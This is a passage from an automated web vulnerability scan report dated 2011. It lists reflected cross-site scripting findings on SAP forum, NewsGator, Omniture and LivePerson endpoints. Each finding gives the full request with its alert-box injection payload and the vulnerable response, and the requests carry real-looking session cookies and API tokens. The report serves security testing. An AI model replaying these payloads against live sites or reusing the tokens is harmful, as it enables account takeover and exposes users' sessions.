s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTgzOUMtRjhFMTQwRTYxODU2ODVBQQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8722
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...

   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=20591626703c</script><a>08b4367be6b&tstart=0";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

3.33. http://forums.sdn.sap.com/thread.jspa [tstart parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the tstart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b4c8</script><a>b798772e4f3 was submitted in the tstart parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=2059162&tstart=01b4c8</script><a>b798772e4f3 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUFDQjEtMzE3QTM2QTc3Mjg1NDE2Nw==
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9061
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: </title
...[SNIP]...
="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2059162&tstart=01b4c8</script><a>b798772e4f3";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

3.34. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 3aa10<script>alert(1)</script>92b285fbac7 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=8A9F478544194B85AC55E891BBE40862&buzzId=215423&_dsrId=ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sat, 15 Oct 2011 13:56:52 GMT
ETag: 634542838121454462
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3034
Cache-Control: public, max-age=300
Date: Sat, 15 Oct 2011 14:24:41 GMT
Connection: close

window.ng_scriptload({id:'ngbuzz_215423_data3aa10<script>alert(1)</script>92b285fbac7',status:200,statusText:'200 OK',response:{Data:[{PostId:21062774210,PubDate:new Date(1318646580000),FeedName:'SAP Developer Network SAP Weblogs: SAP TechEd',Title:'Tune in to SAP TechEd Live!',HtmlUrl
...[SNIP]...

3.35. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c4314<script>alert(1)</script>7157f909e78 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?buzzId=215423c4314<script>alert(1)</script>7157f909e78&apiToken=8A9F478544194B85AC55E891BBE40862 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sat, 15 Oct 2011 14:24:29 GMT
Connection: close
X-N: S

//An error occurred: Could not find Buzz item with id: 215423c4314<script>alert(1)</script>7157f909e78

3.36. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 64204%3balert(1)//95fd43ea14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64204;alert(1)//95fd43ea14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862&64204%3balert(1)//95fd43ea14=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Fri, 07 Oct 2011 20:13:12 GMT
ETag: 634536151927656250
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3794
Cache-Control: public, max-age=600
Date: Sat, 15 Oct 2011 14:24:30 GMT
Connection: close

try{var buzzTemplate_215423="\t{stringify CustomFooter}\n\t\t<div class=\"footerClass\">\n\t\t\t<!--- Style up your footer --->\n\t\t\t<a style=\"cursor: pointer;\" href=\"javascript:void(0)\" onclick
...[SNIP]...

var s = function(){
   try{
       if(typeof ng != "undefined" && typeof ng.buzz != "undefined" && ng.buzz.Buzzlet){
           var b = new ng.buzz.Buzzlet({apiToken:'8A9F478544194B85AC55E891BBE40862',extraArgs:{64204;alert(1)//95fd43ea14:'1'},templateId:'buzzTemplate_215423',name:'_Events - SAP TechEd V2',buzzId:215423,targetId:null,orgCode:'6679',buzzTracking:{parentTrackingId:null,myTrackingId:null},scriptCtx:'window',analytics:{ngA
...[SNIP]...

3.37. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4ee84<script>alert(1)</script>910c67c89ad was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=4&mbox=newhome_offer4ee84<script>alert(1)</script>910c67c89ad&mboxId=0&mboxTime=1318668445075&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:48:18 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 209
Date: Sat, 15 Oct 2011 13:48:17 GMT
Server: Test & Target

mboxFactories.get('default').get('newhome_offer4ee84<script>alert(1)</script>910c67c89ad',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");

3.38. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload bd310<img%20src%3da%20onerror%3dalert(1)>7e3be76c3d4 was submitted in the mbox parameter. This input was echoed as bd310<img src=a onerror=alert(1)>7e3be76c3d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20eventbd310<img%20src%3da%20onerror%3dalert(1)>7e3be76c3d4&mboxId=0&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:49:30 GMT; Path=/m2/omnituremarketing
Content-Length: 264
Date: Sat, 15 Oct 2011 13:49:30 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: eventbd310<img src=a onerror=alert(1)>7e3be76c3d4', 0).setOffer(new mboxOfferDefault()).loaded();}

3.39. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d7f05<script>alert(1)</script>7762cc0ab06 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0d7f05<script>alert(1)</script>7762cc0ab06&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:49:33 GMT; Path=/m2/omnituremarketing
Content-Length: 261
Date: Sat, 15 Oct 2011 13:49:33 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: event', 0d7f05<script>alert(1)</script>7762cc0ab06).setOffer(new mboxOfferDefault()).loaded();}

3.40. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 56ff3<script>alert(1)</script>1c85f2b1615 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging56ff3<script>alert(1)</script>1c85f2b1615&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:48:20 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 217
Date: Sat, 15 Oct 2011 13:48:20 GMT
Server: Test & Target

mboxFactories.get('staging').get('newhome_offer-staging56ff3<script>alert(1)</script>1c85f2b1615',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('staging').getPCId().forceId("1318631787015-280970.19");

3.41. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f841'%3balert(1)//e40655f8366 was submitted in the mboxFactoryId parameter. This input was echoed as 8f841';alert(1)//e40655f8366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging8f841'%3balert(1)//e40655f8366&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:48:07 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1185
Date: Sat, 15 Oct 2011 13:48:07 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging8f841';alert(1)//e40655f8366').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-staging8f841';alert(1)//e40655f8366-newhome_o
...[SNIP]...

3.42. http://sales.liveperson.net/hc/37021986/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1af53<img%20src%3da%20onerror%3dalert(1)>2257775d063 was submitted in the msessionkey parameter. This input was echoed as 1af53<img src=a onerror=alert(1)>2257775d063 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/37021986/?&visitor=5110247826455&msessionkey=37230221800283374401af53<img%20src%3da%20onerror%3dalert(1)>2257775d063&siteContainer=STANDALONE&site=37021986&cmd=mTagKnockPage&lpCallId=385121324332-892147257225&protV=20&lpjson=1&id=4161424150&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C%23chat-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic1%7C%23chat-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic2%7C%23chat-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic3%7C%23voice-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic1%7C%23voice-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic2%7C%23voice-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:25:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=37230221800283374401af53<img src=a onerror=alert(1)>2257775d063; path=/hc/37021986
Set-Cookie: HumanClickKEY=37230221800283374401af53<img src=a onerror=alert(1)>2257775d063; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:25:48 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 42312

lpConnLib.Process({"ResultSet": {"lpCallId":"385121324332-892147257225","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
